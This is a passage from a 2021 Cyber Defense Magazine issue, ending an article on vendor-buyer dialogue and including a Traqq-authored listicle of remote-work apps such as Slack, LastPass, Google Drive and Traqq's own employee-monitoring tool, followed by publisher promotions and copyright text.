honored through technology. To get it right, everyone is going to have to learn to speak across organizational boundaries. In general, I think 2021 is going to be a year when the dialogue between vendors and buyers starts to become more holistic and productive. The cloud computing trend, as well as the growth of DevSecOps and SOAR, are leading to a situation where the old “My solution is better than their solution” argument just really falls flat. We are hearing this in so many ways on the site. Buyers no longer care so much if a solution is 99% effective versus a competitor that is 98%. Good security managers want to understand how a solution will work in context, for a particular business use case. One thing is for sure: It’s going to be an interesting year. Let’s all stay safe.

About the Author Stuart Berman, IT Central Station Super User

Transitioning to Remote Work: The Apps You’ll Need to Ensure A Productive Workforce By Ikechukwu Nnabeze, SEO Copywriter, Traqq

The world is changing at a swift pace. A couple of years ago, remote work was an unheard term in the business world; it was a privilege enjoyed by a select few. However, this is no longer the case as more organizations are embracing working from home and its associated benefits. Even workers and team leaders are now quick to sing about the many positives that it brings. Before the pandemic, working outside the office wasn’t an accepted idea among employers. However, current health risks have changed many minds. Everyone has been forced to adapt and become flexible about how things should be done. Employees who have tasted the work-from-home setup would prefer to continue if given the option. It’s true that there’s no one-size-fits-all when it comes to deciding the sustainability of remote work for your business. Even so, it helps to know the best apps that will help your team transition in this permanent setup. After all, there are several business risks in remote work. Fortunately, there are tech solutions that can mitigate these common problems. These modern digital apps help you to coordinate and monitor your staff, no matter their location. From time tracking software to free collaboration tools for remote teams, there are several ways to ensure productivity among your employees.

Tool to Prevent Miscommunication: Slack It’s easy to lose proper communication while transitioning to a remote working structure. It’s one of the common issues companies face, which can lead to a massive dip in productivity. For starters, workers can no longer talk to each other face to face as they used to. The ease of walking over to a teammate’s desk to ask questions and come up with solutions to a problem is no longer there. This can lead to a messy communications network where vital information can get lost. While emails will work in a scenario where all employees commute to a physical workplace, it’s less feasible with remote work. It’s difficult to hold continuous conversations over emails, especially when you need to talk to many people on small issues at the same time. To create an effective workflow and boost productivity, you need a tool like Slack. This is an instant communication tool that comes with two primary modes of communication: • Channels message • Direct message Using these two modes, employees can exchange solutions, creative ideas, and information seamlessly. In addition, it comes with add-ons that give it an added efficiency that you can’t get with email communication. Slack also features a video call tool that you can use when you want to have face-to-face conversations. This gives a feeling that’s close to what you get from talking to a colleague or employee in a physical office. It’s also useful for holding quick meetings. Everyone can simply sign in and enjoy the pleasure of seeing each other’s faces, smiles, and gestures. The app allows for file sharing, which makes it the perfect communication tool. Moreover, it can be integrated with other third-party team management software such as Jira and Google Calendar.

1. Tool to Prevent Time Theft: Traqq Working from home is great. However, it can come with a problem of distraction. In an office, it’s easy to keep an eye on your employees, caution them, or help them do their tasks without procrastinating. However, when it comes to telecommuting, the story is different. You need to find a way to monitor staff without being the overbearing boss that everybody hates. This is where time management apps come in. Traqq is a time tracking software that allows you to keep tabs on employee activity, no matter where they are in the world. Research shows that individuals tend to work faster when they realize their activity is being monitored. This means that you can ensure an increase in productivity even without having your workers under one roof. For example, managers use Traqq to keep track of their staff’s on-screen activity. They can see which websites and apps an employee visits during work hours. In addition, they get reports on how much time a worker spent on those sites and what they were doing on the pages they opened. This time tracking tool helps you figure out how many minutes or hours each worker spends on particular tasks. At the end of every week or month, you get a detailed report that’ll help you give feedback and coaching to your employees. If a staff member is wasting time surfing through Instagram or playing games during their work time, you’ll know from the activity report that the time management app will generate.

Traqq also performs automatic tracking, which means that it quietly records user activity in the background without creating distractions or interfering with their daily work. It achieves this by taking screenshots or video recordings at intervals. The manager can then review this visual data and see an accurate calculation of the number of hours worked. This app has many features that help to keep employees focused. For instance, this tool measures each worker’s activity level based on keyboard movements and mouse clicks. Your staff will stay focused on tasks, knowing there’s a tool monitoring their activity during work hours. At the end of the workweek or month, the data is collated, and the app automatically gives you an extensive report. It shows the productivity level of each worker and provides accurate data for invoicing, salary payment, and client billing.

2. Tool to Prevent Data Leaks: LastPass As an organization moves its business online, it has to incorporate a lot of digital tools into daily operations. Using various apps and services means having several accounts – this, in turn, means creating many passwords. It can get tedious trying to keep up with remembering and protecting all company passwords, especially when you have several employees under your wing. Writing them down somewhere can be risky as well – they can fall into the wrong hands. To operate an efficient and safe business, you need a way to keep these passwords secure while ensuring workers don’t get locked out of their accounts. LastPass protects your company data by giving every team member a single master login password. As for the passwords to the other numerous accounts, they’re securely stored in the LastPass tool and are loaded automatically whenever a login page requests them. The app is available on several platforms and is compatible with numerous devices. It was designed specifically for remote business purposes and to simplify the process of handling multiple work-from- home employees.

3. Tool to Prevent File Loss: Google Drive We cannot overemphasize the importance of having a secure system for sharing files and collaborating on digital data. Transitioning your business to a remote working structure means you have to find an efficient platform to protect business-related sensitive information. Employees need to exchange lots of information to facilitate the work process and ensure that crucial documents are stored safely. Since they can no longer do this physically, the amount of digital data that needs to be exchanged online will significantly increase. A secure file-exchanging and project- collaboration network is necessary to avoid miscommunication and safeguard sensitive material from getting lost in transit. Sending large files through email can get messy because there’s no way to organize and collaborate with other team members in your inbox. Besides, it’s easy to mistakenly miss an important message when they pour in from several sources simultaneously. Large organizations can easily invest in customized file sharing and collaboration tools. However, small businesses might not have the resources to pull it off.

Fortunately, Google came to the rescue with an app, which small to medium-sized companies can use to share and store data. Google Drive a cloud-based tool that your employees and teammates can use to collaborate on projects while keeping your data secure. No matter the worker’s location, they can share, download, edit, and leave comments on documents. The platform gives you 15GB of storage for free, which you can use to share any type of files—from documents and images to videos and links and videos and spreadsheets. Since many people are already familiar with Google-based products, it’ll be easy to transition your workforce towards using other Google-based tools.

4. Tool to Prevent Mental Blocks: Mural When in a physical office space, it’s easy to get creative ideas from interacting with other employees, having meeting sessions, and engaging in playful banters. Even that chance meeting in an elevator can create bursts of fresh ideas coursing through you. This is not so when working from home – you’re alone, and it can get stale and mentally dull pretty quickly. There are no brainstorming sessions or cooperative working events in your home office to get the inspiration flowing. In these situations, digital communication tools might not be so helpful – creativity and inspiration sometimes need spontaneity, which these apps don’t give. It can get monotonous scheduling calls and video conferences just to bounce ideas off each other. Mural is a digital tool designed specifically for this purpose – the app is like a canvas for ideas and spontaneous creative thoughts. Unlike most project sharing platforms, it gives you the freedom to share ideas in any form you want. Teammates and colleagues can put their thoughts on digital sticky notes, which they can arrange into diagrams, flow charts, and even drawings. Mural adds a new fun way of staying organized and creative. It’s a great alternative to other more traditional project management tools and is an amazing tool for boosting creativity among your workforce.

5. Tool to Prevent Feelings of Isolation: Yammer Remote work can get lonely sometimes, especially when you’re living alone. We are social creatures, and we crave human-to-human communication. When making changes to take your business online, this is something to keep in mind. While there are many professional collaboration and communication tools with all the right features, these apps fail to cover the social aspects of cooperating on projects. To achieve team bonding, consistent communication and feedback between teammates are essential. One way to accomplish this in a traditional office space is through team-building outings and social events. However, this might not be possible when you have several employees in different and faraway locations. Yammer helps you with this. Commonly known as the “Facebook for business,” the app has the makings of a social media network. However, instead of focusing on random personal updates and gossip news sharing, the tool focuses on work-related project updates. Teammates can like, share, and comment on posts/updates made by colleagues on projects that they’re working on, just as they’d on do on social media.

6. Tool to Prevent Inefficient Task Delegation: Every Time Zone Running a remote business means dealing with employees in different time zones. This presents the challenge of not knowing who’s available at any given time, which can make handing over and task delegations difficult. Unfortunately, keeping track of everyone’s time zones can be exhausting, and colleagues may end up messaging or calling each other at odd hours. This can create more barriers to productive communication. Every Time Zone is an app that takes away the issue of performing calculations whenever you need to check who’s available for a task. It shows you the current time in every time zone that your employees or colleagues are working from. This makes it easier to know whom you can call or chat with when necessary. It may seem like a relatively small issue, but knowing who is available and what time they’re reachable can help teammates delegate tasks more efficiently. Productive communication is necessary for building a successful remote business team.

Conclusion Transitioning to a remote business structure doesn’t mean you have to sacrifice productivity and security. With the tools listed in this article, you can protect yourself and employees from miscommunication, data hacking, and time theft. As a manager, solving these issues will give you time to focus on other crucial aspects of your business that require your attention, such as improving your products and services.

About the Author Ikechukwu Nnabeze is a tech expert and content writer at Traqq whose goal is to improve people's lives with the help of modern technology. His interest in providing practical solutions to real-life tech problems has led him to a successful career in content creation. His passion is to help individuals and organizations from all over the world to embrace the life- changing beauty of modern technology. He enjoys poetry and stargazing when he’s not spending time with family. Ikechukwu can be reached online at [email protected] and at our company website https://traqq.com/

Meet Our Publisher: Gary S. Miliefsky, CISSP, fmDHS

“Amazing Keynote”

“Best Speaker on the Hacking Stage”

“Most Entertaining and Engaging”

Gary has been keynoting cyber security events throughout the year. He’s also been a moderator, a panelist and has numerous upcoming events throughout the year.

If you are looking for a cybersecurity expert who can make the difference from a nice event to a stellar conference, look no further email [email protected]

You asked, and it’s finally here…we’ve launched CyberDefense.TV At least a dozen exceptional interviews rolling out each month starting this summer… Market leaders, innovators, CEO hot seat interviews and much more. A new division of Cyber Defense Media Group and sister to Cyber Defense Magazine.

FREE MONTHLY CYBER DEFENSE EMAGAZINE VIA EMAIL ENJOY OUR MONTHLY ELECTRONIC EDITIONS OF OUR MAGAZINES FOR FREE.

This magazine is by and for ethical information security professionals with a twist on innovative consumer products and privacy issues on top of best practices for IT security and Regulatory Compliance. Our mission is to share cutting edge knowledge, real world stories and independent lab reviews on the best ideas, products and services in the information technology industry. Our monthly Cyber Defense e- Magazines will also keep you up to speed on what’s happening in the cyber-crime and cyber warfare arena plus we’ll inform you as next generation and innovative technology vendors have news worthy of sharing with you – so enjoy. You get all of this for FREE, always, for our electronic editions. Click here to sign up today and within moments, you’ll receive your first email from us with an archive of our newsletters along with this month’s newsletter.

By signing up, you’ll always be in the loop with CDM.

Copyright (C) 2021, Cyber Defense Magazine, a division of CYBER DEFENSE MEDIA GROUP (STEVEN G. SAMUELS LLC. d/b/a) 276 Fifth Avenue, Suite 704, New York, NY 10001, Toll Free (USA): 1-833-844-9468 d/b/a CyberDefenseAwards.com, CyberDefenseMagazine.com, CyberDefenseNewswire.com, CyberDefenseProfessionals.com, CyberDefenseRadio.com and CyberDefenseTV.com, is a Limited Liability Corporation (LLC) originally incorporated in the United States of America. Our Tax ID (EIN) is: 45-4188465, Cyber Defense Magazine® is a registered trademark of Cyber Defense Media Group. EIN: 454-18-8465, DUNS# 078358935. All rights reserved worldwide. [email protected] All rights reserved worldwide. Copyright © 2021, Cyber Defense Magazine. All rights reserved. No part of this newsletter may be used or reproduced by any means, graphic, electronic, or mechanical, including photocopying, recording, taping or by any information storage retrieval system without the written permission of the publisher except in the case of brief quotations embodied in critical articles and reviews. Because of the dynamic nature of the Internet, any Web addresses or links contained in this newsletter may have changed since publication and may no longer be valid. The views expressed in this work are solely those of the author and do not necessarily reflect the views of the publisher, and the publisher hereby disclaims any responsibility for them. Send us great content and we’ll post it in the magazine for free, subject to editorial approval and layout. Email us at [email protected] Cyber Defense Magazine 276 Fifth Avenue, Suite 704, New York, NY 1000 EIN: 454-18-8465, DUNS# 078358935. All rights reserved worldwide. [email protected] www.cyberdefensemagazine.com

NEW YORK (US HQ), LONDON (UK/EU), HONG KONG (ASIA) Cyber Defense Magazine - Cyber Defense eMagazine rev. date: 01/04/2021 Books by our Publisher: https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys- ebook/dp/B07KPNS9NH (with others coming soon...)

9 Years in The Making… Thank You to our Loyal Subscribers!

We've Completely Rebuilt CyberDefenseMagazine.com - Please Let Us Know What You Think. It's mobile and tablet friendly and superfast. We hope you like it. In addition, we're shooting for 7x24x365 uptime as we continue to scale with improved Web App Firewalls, Content Deliver Networks (CDNs) around the Globe, Faster and More Secure DNS and CyberDefenseMagazine.com up and running as an array of live mirror sites.

Millions of monthly readers and new platforms coming…starting with https://www.cyberdefenseprofessionals.com this month…